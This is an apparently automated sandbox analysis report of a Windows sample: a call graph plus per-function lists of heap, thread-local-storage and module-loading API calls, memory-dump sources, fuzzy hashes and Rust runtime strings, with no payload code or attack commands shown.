2099->2100 2101 d9bef0 77 API calls 2100->2101 2102 d9bc9f 2101->2102 2103 d9bef0 77 API calls 2102->2103 2106 d9bcff 2102->2106 2103->2106 2104 d9bd6f 2105 a6e560 77 API calls 2104->2105 2107 d9bd74 2105->2107 2106->2104 2178 a815e9 2106->2178 2107->1972 2110 d9bd80 2111 d9bae0 77 API calls 2110->2111 2112 d9bd89 2111->2112 2113 d9bef0 77 API calls 2112->2113 2114 d9bdd3 2113->2114 2115 d9bef0 77 API calls 2114->2115 2116 d9be22 2115->2116 2117 a71220 3 API calls 2116->2117 2118 d9be3e 2117->2118 2119 d9beae 2118->2119 2120 d9be42 2118->2120 2122 d9bae0 77 API calls 2119->2122 2121 d9be6a 2120->2121 2123 d9be8b HeapFree 2120->2123 2124 d9bebd 2120->2124 2121->1972 2122->2124 2123->2121 2125 d9c0b0 77 API calls 2124->2125 2126 d9beec 2125->2126 2127 c7e9e0 77 API calls 2126->2127 2128 d9bf18 2127->2128 2130 d9c0b0 78 API calls 2129->2130 
2131 da697e 2130->2131 2133 d9c0b0 78 API calls 2132->2133 2134 da69b2 2133->2134 2185 c80240 2135->2185 2137 a71802 2141 d9c200 78 API calls 2137->2141 2138 a717d3 2223 d9bfe0 2138->2223 2140 a71810 2149 d9bfe0 78 API calls 2140->2149 2141->2140 2142 a71345 2142->2137 2142->2138 2142->2140 2143 a71735 2142->2143 2144 a717e1 2142->2144 2145 a717f2 2142->2145 2148 a7181e 2142->2148 2150 a71727 2142->2150 2152 a7182a 2142->2152 2154 a716bb 2142->2154 2220 d9bf80 2142->2220 2146 a7173d 2143->2146 2155 d9bf80 78 API calls 2143->2155 2226 d9c200 2144->2226 2151 d9bfe0 78 API calls 2145->2151 2146->2150 2156 d9bf80 78 API calls 2146->2156 2153 d9c200 78 API calls 2148->2153 2149->2148 2150->2091 2151->2137 2159 d9bfe0 78 API calls 2152->2159 2153->2152 2158 a716e1 2154->2158 2160 d9bf80 78 API calls 2154->2160 2155->2146 2156->2138 2161 a716f2 2158->2161 2164 d9bf80 78 API calls 2158->2164 2162 a7183c 2159->2162 2160->2158 2161->2150 2166 d9bf80 78 API calls 2161->2166 2163 a71853 2162->2163 2237 d9bcff 2162->2237 2163->2091 2164->2161 2166->2143 2168 a6e63c 2167->2168 2170 a6e665 2167->2170 2169 a6e670 2168->2169 2168->2170 2171 a6e650 RtlReAllocateHeap 2168->2171 2169->2170 2172 a71220 3 API calls 2169->2172 2170->2088 2170->2090 2170->2094 2171->2170 2172->2170 2174 d9bef0 77 API calls 2173->2174 2175 a6e596 2174->2175 2176 a6e5ba 2175->2176 2177 a6e5a9 HeapFree 2175->2177 2176->2090 2177->2176 2179 a815f6 2178->2179 2182 a81616 2178->2182 2180 a8160d 2179->2180 2181 a81624 2179->2181 2179->2182 2324 a71280 2180->2324 2181->2182 2184 a71220 3 API calls 2181->2184 2182->2104 2182->2107 2182->2110 2184->2182 2263 c80230 2185->2263 2187 c8024b 2188 c80261 TlsGetValue 2187->2188 2190 da6800 72 API calls 2187->2190 2191 c8026e 2188->2191 2190->2188 2192 c80276 2191->2192 2193 c80284 TlsGetValue 2191->2193 2194 da6800 72 API calls 2191->2194 2192->2142 2193->2192 2196 c8029a 2193->2196 2194->2193 2197 c80306 2196->2197 2199 a71220 3 API calls 2196->2199 2300 da6ee0 
2197->2300 2200 c802b6 2199->2200 2201 c80349 2200->2201 2202 c802be 2200->2202 2204 d9bae0 72 API calls 2201->2204 2203 c802e0 TlsSetValue 2202->2203 2206 da6800 72 API calls 2202->2206 2203->2197 2207 c80358 2204->2207 2205 c8030b 2205->2192 2318 c79d00 2205->2318 2206->2203 2210 c80398 TlsSetValue 2207->2210 2212 da6800 72 API calls 2207->2212 2213 c803d9 HeapFree 2210->2213 2214 c803c5 2210->2214 2212->2210 2215 c803ee 2213->2215 2216 c803f1 2213->2216 2214->2213 2219 c79d00 3 API calls 2214->2219 2217 c80403 TlsSetValue 2215->2217 2218 da6800 72 API calls 2216->2218 2217->2142 2218->2217 2219->2213 2221 d9bef0 78 API calls 2220->2221 2222 d9bfdf 2221->2222 2224 d9bef0 78 API calls 2223->2224 2225 d9c03f 2224->2225 2227 d9bef0 78 API calls 2226->2227 2228 d9c25f 2227->2228 2229 d9bef0 78 API calls 2228->2229 2230 d9c2a6 2229->2230 2231 d9bef0 78 API calls 2230->2231 2232 d9c2f6 2231->2232 2233 d9bef0 78 API calls 2232->2233 2234 d9c371 2233->2234 2235 d9bef0 78 API calls 2234->2235 2236 d9c3cf 2235->2236 2238 d9bd0b 2237->2238 2239 d9bd6f 2237->2239 2242 a815e9 7 API calls 2238->2242 2240 a6e560 77 API calls 2239->2240 2241 d9bd74 2240->2241 2241->2163 2243 d9bd58 2242->2243 2243->2239 2243->2241 2244 d9bd80 2243->2244 2245 d9bae0 77 API calls 2244->2245 2246 d9bd89 2245->2246 2247 d9bef0 77 API calls 2246->2247 2248 d9bdd3 2247->2248 2249 d9bef0 77 API calls 2248->2249 2250 d9be22 2249->2250 2251 a71220 3 API calls 2250->2251 2252 d9be3e 2251->2252 2253 d9beae 2252->2253 2254 d9be42 2252->2254 2256 d9bae0 77 API calls 2253->2256 2255 d9be6a 2254->2255 2257 d9be8b HeapFree 2254->2257 2258 d9bebd 2254->2258 2255->2163 2256->2258 2257->2255 2259 d9c0b0 77 API calls 2258->2259 2260 d9beec 2259->2260 2261 c7e9e0 77 API calls 2260->2261 2262 d9bf18 2261->2262 2264 c7de20 HeapFree HeapFree HeapFree HeapFree 2263->2264 2265 c80235 2264->2265 2266 c80230 72 API calls 2265->2266 2267 c8024b 2266->2267 2268 c80261 TlsGetValue 2267->2268 2270 da6800 72 API calls 
2267->2270 2271 c8026e 2268->2271 2270->2268 2272 c80284 TlsGetValue 2271->2272 2273 da6800 72 API calls 2271->2273 2290 c80276 2271->2290 2275 c8029a 2272->2275 2272->2290 2273->2272 2276 c80306 2275->2276 2278 a71220 RtlAllocateHeap GetProcessHeap RtlAllocateHeap 2275->2278 2277 da6ee0 72 API calls 2276->2277 2283 c8030b 2277->2283 2279 c802b6 2278->2279 2280 c80349 2279->2280 2281 c802be 2279->2281 2282 d9bae0 72 API calls 2280->2282 2284 da6800 72 API calls 2281->2284 2287 c802e0 TlsSetValue 2281->2287 2289 c80358 2282->2289 2286 c79d00 HeapFree HeapFree HeapFree 2283->2286 2283->2290 2284->2287 2286->2290 2287->2276 2288 c80398 TlsSetValue 2293 c803d9 HeapFree 2288->2293 2294 c803c5 2288->2294 2289->2288 2292 da6800 72 API calls 2289->2292 2290->2187 2292->2288 2295 c803ee 2293->2295 2296 c803f1 2293->2296 2294->2293 2299 c79d00 HeapFree HeapFree HeapFree 2294->2299 2297 c80403 TlsSetValue 2295->2297 2298 da6800 72 API calls 2296->2298 2297->2187 2298->2297 2299->2293 2301 c62420 78 API calls 2300->2301 2302 da6f12 2301->2302 2303 da6f7b 2302->2303 2304 da6f19 2302->2304 2306 d9c380 78 API calls 2303->2306 2305 c7ca40 78 API calls 2304->2305 2307 da6f25 2305->2307 2308 da6f8f 2306->2308 2307->2308 2309 da6f2b 2307->2309 2310 d9c300 78 API calls 2308->2310 2311 a71220 RtlAllocateHeap GetProcessHeap RtlAllocateHeap 2309->2311 2312 da6fac 2310->2312 2313 da6f41 2311->2313 2314 da6fe7 2312->2314 2316 c62260 HeapFree HeapFree 2312->2316 2315 da6f45 2313->2315 2317 d9bae0 78 API calls 2313->2317 2314->2205 2315->2205 2316->2314 2317->2312 2319 c79d15 2318->2319 2320 c79d0d 2318->2320 2322 c79d31 2319->2322 2323 c79d22 HeapFree 2319->2323 2321 c62260 HeapFree HeapFree 2320->2321 2321->2319 2322->2192 2323->2322 2325 a712a5 2324->2325 2326 a71293 RtlReAllocateHeap 2324->2326 2328 a712b0 GetProcessHeap 2325->2328 2329 a712bf HeapAlloc 2325->2329 2327 a71305 2326->2327 2327->2182 2328->2327 2330 a712ba 2328->2330 2329->2327 2331 a712d1 2329->2331 2330->2329 2332 a712ef 
HeapFree 2331->2332 2332->2327 2334 c62798 2333->2334 2338 c626ef TlsGetValue 2333->2338 2335 da6800 75 API calls 2334->2335 2335->2338 2337 c626fc 2339 c62704 2337->2339 2340 c62719 TlsGetValue 2337->2340 2342 da6800 75 API calls 2337->2342 2338->2337 2339->1981 2340->2339 2343 c62726 2340->2343 2342->2340 2344 a71220 3 API calls 2343->2344 2348 c62767 2343->2348 2345 c62742 2344->2345 2346 c62746 2345->2346 2347 c627c2 2345->2347 2350 c6275e TlsSetValue 2346->2350 2352 da6800 75 API calls 2346->2352 2351 d9bae0 75 API calls 2347->2351 2348->2339 2349 c62260 2 API calls 2348->2349 2349->2339 2350->2348 2354 c627d1 2351->2354 2352->2350 2355 c62802 2354->2355 2356 c627f2 2354->2356 2373 a7a170 2355->2373 2357 c627f7 2356->2357 2378 a803c0 2356->2378 2357->1981 2359 c62809 2359->1981 2361 c62814 2361->1981 2363 a71220 3 API calls 2362->2363 2364 c61bc7 2363->2364 2365 c61bce 2364->2365 2366 c61c49 2364->2366 2370 c61c16 2365->2370 2392 da6a40 2365->2392 2367 d9bae0 77 API calls 2366->2367 2369 c61c47 2367->2369 2368 c61ca0 2368->1984 2369->2368 2372 c61c8f HeapFree 2369->2372 2370->1984 2372->2368 2374 a7a190 2373->2374 2374->2374 2375 a7a1c0 2374->2375 2389 d9bf20 2374->2389 2375->2359 2379 a803e0 2378->2379 2379->2379 2380 a80410 2379->2380 2381 d9bf20 78 API calls 2379->2381 2380->2361 2382 a8044e 2381->2382 2383 a804bc 2382->2383 2384 d9bf20 78 API calls 2382->2384 2383->2361 2385 a804fd 2384->2385 2386 a8056c 2385->2386 2387 d9bf20 78 API calls 2385->2387 2386->2361 2388 a805ad 2387->2388 2388->2361 2390 d9bef0 78 API calls 2389->2390 2391 d9bf7f 2390->2391 2393 d9bef0 78 API calls 2392->2393 2396 da6a76 2393->2396 2394 da6afa 2395 a6e560 78 API calls 2394->2395 2397 da6aff 2395->2397 2396->2394 2411 c64830 2396->2411 2397->2369 2400 da6b0b 2401 d9bae0 78 API calls 2400->2401 2404 da6b14 2401->2404 2402 da6b90 2403 a6e560 78 API calls 2402->2403 2405 da6b95 2403->2405 2404->2402 2406 c64830 7 API calls 2404->2406 2405->2369 2407 da6b76 2406->2407 2407->2402 
2407->2405 2408 da6ba0 2407->2408 2409 d9bae0 78 API calls 2408->2409 2410 da6ba9 2409->2410 2412 c6483d 2411->2412 2415 c6485d 2411->2415 2413 c64875 2412->2413 2414 c64854 2412->2414 2412->2415 2413->2415 2417 a71220 3 API calls 2413->2417 2416 a71280 4 API calls 2414->2416 2415->2394 2415->2397 2415->2400 2416->2415 2417->2415 2419 c7e906 2418->2419 2421 c7e87f 2418->2421 2420 da6bb0 76 API calls 2419->2420 2420->2421 2422 c7e8ea ReleaseSRWLockExclusive 2421->2422 2423 da6bb0 76 API calls 2421->2423 2422->1997 2424 c7e921 2423->2424 2424->2422 2426 c71359 2425->2426 2427 d9c040 78 API calls 2426->2427 2428 c71405 2427->2428 2430 c71434 2428->2430 2433 c66f30 2430->2433 2435 c66f4e 2433->2435 2434 c6738d 2436 d9bf20 78 API calls 2434->2436 2437 c672ae 2434->2437 2435->2434 2435->2437 2438 d9bfe0 78 API calls 2435->2438 2439 c6728f 2435->2439 2436->2439 2438->2434 2439->2437 2440 d9bf20 78 API calls 2439->2440 2442 c673c9 2439->2442 2440->2442 2441 d9bf20 78 API calls 2443 c6752e 2441->2443 2442->2437 2442->2441 2445 c67543 2443->2445 2447 c67742 2445->2447 2450 c67554 2445->2450 2446 c67767 2446->2447 2448 d9bf20 78 API calls 2446->2448 2449 c6787a 2448->2449 2451 d9bfe0 78 API calls 2449->2451 2450->2446 2450->2447 2452 d9bf20 78 API calls 2450->2452 2455 c67659 2450->2455 2453 c67888 2451->2453 2452->2446 2454 d9bf20 78 API calls 2453->2454 2454->2455 2455->2447 2456 d9bf20 78 API calls 2455->2456 2457 c678a7 2456->2457 2482 da6470 2458->2482 2459 da6695 2463 da66b7 2459->2463 2460 da64a0 2464 d9bef0 75 API calls 2460->2464 2461 da66cc 2461->2062 2462 da64c3 2467 d9c040 75 API calls 2462->2467 2507 c620b0 2463->2507 2464->2462 2465 da64e7 TlsGetValue 2465->2482 2468 da6798 2467->2468 2470 da67b7 2468->2470 2473 c62260 2 API calls 2468->2473 2469 da651d TlsGetValue 2469->2482 2470->2062 2471 da6800 75 API calls 2471->2482 2472 a71220 3 API calls 2472->2482 2473->2470 2474 da6530 2521 d9c380 2474->2521 2475 c61b80 75 API calls 2475->2482 2476 da6734 2478 d9bae0 
75 API calls 2476->2478 2478->2460 2479 da6660 2486 c622a0 2479->2486 2480 da66dd 2481 d9bef0 75 API calls 2480->2481 2481->2474 2482->2459 2482->2460 2482->2461 2482->2462 2482->2465 2482->2469 2482->2471 2482->2472 2482->2474 2482->2475 2482->2476 2482->2479 2482->2480 2484 da657b TlsSetValue 2482->2484 2485 c62260 HeapFree HeapFree 2482->2485 2484->2482 2485->2482 2487 c62420 76 API calls 2486->2487 2488 c622d9 2487->2488 2489 c622e1 2488->2489 2490 c6238c 2488->2490 2492 c622fe 2489->2492 2497 c62316 2489->2497 2498 c62314 2489->2498 2491 d9c380 76 API calls 2490->2491 2493 c623a0 2491->2493 2496 c62300 WaitOnAddress 2492->2496 2524 c624f0 2493->2524 2494 c6237b 2494->2482 2495 c62260 2 API calls 2495->2494 2496->2496 2496->2498 2497->2498 2501 c623a5 2497->2501 2502 c62340 2497->2502 2498->2494 2498->2495 2504 d9bef0 76 API calls 2501->2504 2502->2498 2505 c62352 CloseHandle 2502->2505 2504->2493 2505->2498 2508 c62219 2507->2508 2519 c620f0 2507->2519 2531 da69c0 2508->2531 2509 c620f5 2509->2461 2511 c62238 2513 c62257 2511->2513 2515 c62260 2 API calls 2511->2515 2512 c621b8 2514 d9c040 77 API calls 2512->2514 2513->2461 2516 c621d3 2514->2516 2515->2513 2518 d9bef0 77 API calls 2516->2518 2517 c62260 2 API calls 2517->2519 2518->2508 2519->2509 2519->2512 2519->2516 2519->2517 2520 c62192 CloseHandle 2519->2520 2520->2519 2522 d9bef0 78 API calls 2521->2522 2523 d9c3cf 2522->2523 2525 c61d20 2 API calls 2524->2525 2526 c6253a 2525->2526 2527 c61e80 2 API calls 2526->2527 2528 c6254a GetModuleHandleA 2527->2528 2529 c6257e 2528->2529 2530 c6256f GetProcAddress 2528->2530 2530->2529 2532 d9c0b0 78 API calls 2531->2532 2533 da69ee 2532->2533 2534 da69fa 2533->2534 2535 da6430 78 API calls 2533->2535 2534->2511 2536 da6a3a 2535->2536 2536->2511 2537 da6430 2561 da6470 2537->2561 2538 da6695 2542 da66b7 2538->2542 2539 da64a0 2543 d9bef0 75 API calls 2539->2543 2540 da66cc 2541 da64c3 2546 d9c040 75 API calls 2541->2546 2545 c620b0 75 API calls 2542->2545 
2543->2541 2544 da64e7 TlsGetValue 2544->2561 2545->2540 2547 da6798 2546->2547 2549 da67b7 2547->2549 2552 c62260 2 API calls 2547->2552 2548 da651d TlsGetValue 2548->2561 2550 da6800 75 API calls 2550->2561 2551 a71220 3 API calls 2551->2561 2552->2549 2553 da6530 2556 d9c380 75 API calls 2553->2556 2554 c61b80 75 API calls 2554->2561 2555 da6734 2557 d9bae0 75 API calls 2555->2557 2556->2555 2557->2539 2558 da6660 2562 c622a0 75 API calls 2558->2562 2559 da66dd 2560 d9bef0 75 API calls 2559->2560 2560->2553 2561->2538 2561->2539 2561->2540 2561->2541 2561->2544 2561->2548 2561->2550 2561->2551 2561->2553 2561->2554 2561->2555 2561->2558 2561->2559 2563 da657b TlsSetValue 2561->2563 2564 c62260 HeapFree HeapFree 2561->2564 2562->2561 2563->2561 2564->2561 2565 d96992 2568 d97420 2565->2568 2567 d96997 2567->2567 2569 d97436 2568->2569 2571 d9743f 2569->2571 2572 d973d3 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 2569->2572 2571->2567 2572->2571

                                                                        Callgraph

                                                                        • Executed
                                                                        • Not Executed
                                                                        • Opacity -> Relevance
                                                                        • Disassembly available
                                                                        callgraph 0 Function_00C67543 32 Function_00D9BFE0 0->32 50 Function_00C67925 0->50 73 Function_00D9BF20 0->73 1 Function_00C63BC0 6 Function_00A71220 1->6 33 Function_00D9BAE0 1->33 49 Function_00DA6800 1->49 2 Function_00C71340 9 Function_00C7134F 2->9 3 Function_00A72D20 15 Function_00A72D30 3->15 4 Function_00A72C20 4->3 5 Function_00C7CA40 5->6 29 Function_00D9BEF0 5->29 5->33 46 Function_00D9C380 5->46 5->49 7 Function_00C79D40 7->29 34 Function_00D9C460 7->34 8 Function_00C80240 8->6 8->33 35 Function_00DA6EE0 8->35 41 Function_00C79D00 8->41 8->49 72 Function_00C80230 8->72 16 Function_00D9C040 9->16 63 Function_00C71434 9->63 10 Function_00D9C3D0 28 Function_00C7E9E0 10->28 10->34 11 Function_00D973D3 12 Function_00DA6950 60 Function_00D9C0B0 12->60 13 Function_00A6E630 13->6 14 Function_00A78030 67 Function_00A73250 15->67 16->29 16->60 17 Function_00D9C540 26 Function_00A7B200 17->26 18 Function_00D97940 19 Function_00DA69C0 19->60 61 Function_00DA6430 19->61 20 Function_00DA6A40 20->29 20->33 39 Function_00A6E560 20->39 64 Function_00C64830 20->64 21 Function_00C626E0 21->4 21->6 22 Function_00C62260 21->22 21->33 43 Function_00A7A170 21->43 21->49 59 Function_00A803C0 21->59 23 Function_00D9BCFF 23->6 23->28 23->29 23->33 36 Function_00A815E9 23->36 23->39 23->60 69 Function_00C71330 23->69 24 Function_00C6FDE0 24->6 24->33 24->49 51 Function_00B3D250 24->51 25 Function_00A71280 25->18 26->16 26->17 26->29 44 Function_00D9C200 26->44 27 Function_00C7DF60 70 Function_00C7E830 27->70 28->16 58 Function_00C7EA20 28->58 29->28 30 Function_00D9C470 30->10 30->29 30->60 31 Function_00C624F0 38 Function_00C61E80 31->38 52 Function_00C61D20 31->52 32->29 33->6 33->13 33->28 33->29 33->33 33->36 33->39 56 Function_00A71340 33->56 33->60 33->69 34->30 35->5 35->6 35->22 35->33 45 Function_00D9C300 35->45 35->46 53 Function_00C62420 35->53 36->6 36->25 37 Function_00D9801A 39->29 40 
Function_00C61B80 40->6 40->20 40->33 41->22 42 Function_00D96992 74 Function_00D97420 42->74 43->3 43->14 43->73 44->29 45->29 46->29 47 Function_00D9BF80 47->29 48 Function_00DA6980 48->60 49->12 49->29 49->48 50->37 68 Function_00A741D0 52->68 53->21 53->29 53->40 54 Function_00C622A0 54->22 54->29 54->31 54->46 54->53 55 Function_00C7DE20 55->52 56->8 56->18 56->23 56->32 56->44 56->47 57 Function_00C7EB20 57->1 57->2 57->22 57->24 57->27 57->38 57->45 57->51 57->52 57->53 62 Function_00DA6BB0 57->62 57->69 71 Function_00C7EA30 58->71 59->3 59->73 60->29 61->6 61->16 61->22 61->29 61->33 61->40 61->46 61->49 61->54 65 Function_00C620B0 61->65 62->1 62->45 62->61 66 Function_00C66F30 63->66 64->6 64->25 65->16 65->19 65->22 65->29 66->0 66->32 66->73 70->62 71->57 72->6 72->33 72->35 72->41 72->49 72->55 72->72 73->29 74->11

                                                                        Control-flow Graph

                                                                        Control-flow graph of a71220-a7127b (rendered graph omitted; legend: Executed, Not Executed). Basic blocks call GetProcessHeap and RtlAllocateHeap.
                                                                        APIs
                                                                        • RtlAllocateHeap.NTDLL(00000000,00000000,0000000C,?,?,?,?,?,?,?,?,?,?), ref: 00A71238
                                                                        • GetProcessHeap.KERNEL32(?,?,00DA6556,?,?,?,?,?,?,?,?,?,?), ref: 00A71240
                                                                        • RtlAllocateHeap.NTDLL(00000000,00000000,0000000C,?,?,?,?,?,?,?,?,?,?), ref: 00A7125A
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1849429439.0000000000A51000.00000020.00000001.01000000.00000000.sdmp, Offset: 00A50000, based on PE: true
                                                                        • Associated: 00000000.00000002.1849398359.0000000000A50000.00000002.00000001.01000000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1849683321.0000000000DAA000.00000002.00000001.01000000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1849683321.0000000000DF9000.00000002.00000001.01000000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1849813447.0000000000EDB000.00000004.00000001.01000000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1849838645.0000000000EDE000.00000008.00000001.01000000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1849865833.0000000000EDF000.00000004.00000001.01000000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1849892662.0000000000EE1000.00000002.00000001.01000000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_a50000_888.jbxd
                                                                        Similarity
                                                                        • API ID: Heap$Allocate$Process
                                                                        • String ID:
                                                                        • API String ID: 980559045-0
                                                                        • Opcode ID: 17a991c33082610db007b501db5d0799e96db454d307f927510aecf4562a1c67
                                                                        • Instruction ID: 66d3a9296743cde1a3b514af4cc021fd56be6c98d1a53f325615126485b01cae
                                                                        • Opcode Fuzzy Hash: 17a991c33082610db007b501db5d0799e96db454d307f927510aecf4562a1c67
                                                                        • Instruction Fuzzy Hash: 16F0BB717042115BDF2457BEAC08BDB67E8A786750B15C43DF50ED7291EA70C800C6E4

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • SetThreadStackGuarantee.KERNELBASE(?), ref: 00C79D78
                                                                        • GetLastError.KERNEL32 ref: 00C79D82
                                                                        • HeapFree.KERNEL32(00000000,00000000), ref: 00C79DCB
                                                                        • HeapFree.KERNEL32(00000000,?), ref: 00C79DDC
                                                                        • HeapFree.KERNEL32(00000000,?), ref: 00C79E6D
                                                                        • HeapFree.KERNEL32(00000000,?), ref: 00C79E7E
                                                                        Strings
                                                                        • chunk size must be non-zero, xrefs: 00C79E14
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1849429439.0000000000A51000.00000020.00000001.01000000.00000000.sdmp, Offset: 00A50000, based on PE: true
                                                                        • Associated: 00000000.00000002.1849398359.0000000000A50000.00000002.00000001.01000000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1849683321.0000000000DAA000.00000002.00000001.01000000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1849683321.0000000000DF9000.00000002.00000001.01000000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1849813447.0000000000EDB000.00000004.00000001.01000000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1849838645.0000000000EDE000.00000008.00000001.01000000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1849865833.0000000000EDF000.00000004.00000001.01000000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1849892662.0000000000EE1000.00000002.00000001.01000000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_a50000_888.jbxd
                                                                        Similarity
                                                                        • API ID: FreeHeap$ErrorGuaranteeLastStackThread
                                                                        • String ID: chunk size must be non-zero
                                                                        • API String ID: 3680998240-1054586041
                                                                        • Opcode ID: 6d4916a39b9d00cbb8fdbbe4e74cc0a0588841940a2a531a887049c8584eb139
                                                                        • Instruction ID: 1b794160020a248af6bf7e34b5f3ec3dd95bd2d1c6025283e171037d098bf6eb
                                                                        • Opcode Fuzzy Hash: 6d4916a39b9d00cbb8fdbbe4e74cc0a0588841940a2a531a887049c8584eb139
                                                                        • Instruction Fuzzy Hash: 0A4115759002089FDF10DF98EC49BEDBBB5FB08704F108525E819AB3A0D375A948CFA5

                                                                        Control-flow Graph

                                                                        Control-flow graph of da6430-da67bb (rendered graph omitted; legend: Executed, Not Executed). Basic blocks call TlsGetValue and TlsSetValue and the local subroutines c620b0, d9bef0, d9c040, c62260, da6800, a71220, d9bae0, c61b80, d9c380 and c622a0.
                                                                        Strings
                                                                        • use of std::thread::current() is not possible after the thread's local data has been destroyed, xrefs: 00DA6720
                                                                        • chunk size must be non-zero, xrefs: 00DA66FA, 00DA6765
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1849429439.0000000000A51000.00000020.00000001.01000000.00000000.sdmp, Offset: 00A50000, based on PE: true
                                                                        • Associated: 00000000.00000002.1849398359.0000000000A50000.00000002.00000001.01000000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1849683321.0000000000DAA000.00000002.00000001.01000000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1849683321.0000000000DF9000.00000002.00000001.01000000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1849813447.0000000000EDB000.00000004.00000001.01000000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1849838645.0000000000EDE000.00000008.00000001.01000000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1849865833.0000000000EDF000.00000004.00000001.01000000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1849892662.0000000000EE1000.00000002.00000001.01000000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_a50000_888.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: chunk size must be non-zero$use of std::thread::current() is not possible after the thread's local data has been destroyed
                                                                        • API String ID: 0-991767630
                                                                        • Opcode ID: b709d725baf93c51e773718bd4810efef31937e4c6d2cca69b93ee0cac800ef0
                                                                        • Instruction ID: 910e7274107adf942537d16ce79551685e4b79f54330e175ede6b0b079e4367a
                                                                        • Opcode Fuzzy Hash: b709d725baf93c51e773718bd4810efef31937e4c6d2cca69b93ee0cac800ef0
                                                                        • Instruction Fuzzy Hash: B79159B1A01219CBCF20DFA4C8457AEBBB5FB46324F1C4269E465AB3D1DB75D901CBA0

                                                                        Control-flow Graph

                                                                        Control-flow graph of a71280-a7130d (rendered graph omitted; legend: Executed, Not Executed). Basic blocks call RtlReAllocateHeap, GetProcessHeap, HeapAlloc and HeapFree and the local subroutine d97940.
                                                                        APIs
                                                                        • RtlReAllocateHeap.NTDLL(00000000,?,?,?,?,00000000,?,00C6485D,00000000,?,?,00000004,?,00DA6AE0,00000000), ref: 00A7129D
                                                                        • GetProcessHeap.KERNEL32(?,?,00000000,?,00C6485D,00000000,?,?,00000004,?,00DA6AE0,00000000), ref: 00A712B0
                                                                        • HeapAlloc.KERNEL32(012F0000,00000000,?,?,?,00000000,?,00C6485D,00000000,?,?,00000004,?,00DA6AE0,00000000), ref: 00A712C7
                                                                        • HeapFree.KERNEL32(00000000,?), ref: 00A712FD
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1849429439.0000000000A51000.00000020.00000001.01000000.00000000.sdmp, Offset: 00A50000, based on PE: true
                                                                        • Associated: 00000000.00000002.1849398359.0000000000A50000.00000002.00000001.01000000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1849683321.0000000000DAA000.00000002.00000001.01000000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1849683321.0000000000DF9000.00000002.00000001.01000000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1849813447.0000000000EDB000.00000004.00000001.01000000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1849838645.0000000000EDE000.00000008.00000001.01000000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1849865833.0000000000EDF000.00000004.00000001.01000000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1849892662.0000000000EE1000.00000002.00000001.01000000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_a50000_888.jbxd
                                                                        Similarity
                                                                        • API ID: Heap$AllocAllocateFreeProcess
                                                                        • String ID:
                                                                        • API String ID: 3553877500-0
                                                                        • Opcode ID: 2375b397cc911aa4b93b6b569badc48464ecae3cbf78e305ca457c273b674e61
                                                                        • Instruction ID: 9bd0a0bff54e9e0a7bd7258c1bae1a38c712d585293dd9a4bb15c6d8ebd4a490
                                                                        • Opcode Fuzzy Hash: 2375b397cc911aa4b93b6b569badc48464ecae3cbf78e305ca457c273b674e61
                                                                        • Instruction Fuzzy Hash: 3801C471704301AFDB109FAAFC84B6B7BE9EB45354F118539F409D6691EB609804C7A0

                                                                        Control-flow Graph

                                                                        Control-flow graph of a6e630-a6e6b6 (rendered graph omitted; legend: Executed, Not Executed). Basic blocks call RtlReAllocateHeap and the local subroutine a71220.
                                                                        APIs
                                                                        • RtlReAllocateHeap.NTDLL(00000000,?,?,?,00000008,00D9BB46,00000008), ref: 00A6E65B
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1849429439.0000000000A51000.00000020.00000001.01000000.00000000.sdmp, Offset: 00A50000, based on PE: true
                                                                        • Associated: 00000000.00000002.1849398359.0000000000A50000.00000002.00000001.01000000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1849683321.0000000000DAA000.00000002.00000001.01000000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1849683321.0000000000DF9000.00000002.00000001.01000000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1849813447.0000000000EDB000.00000004.00000001.01000000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1849838645.0000000000EDE000.00000008.00000001.01000000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1849865833.0000000000EDF000.00000004.00000001.01000000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1849892662.0000000000EE1000.00000002.00000001.01000000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_a50000_888.jbxd
                                                                        Similarity
                                                                        • API ID: AllocateHeap
                                                                        • String ID:
                                                                        • API String ID: 1279760036-0
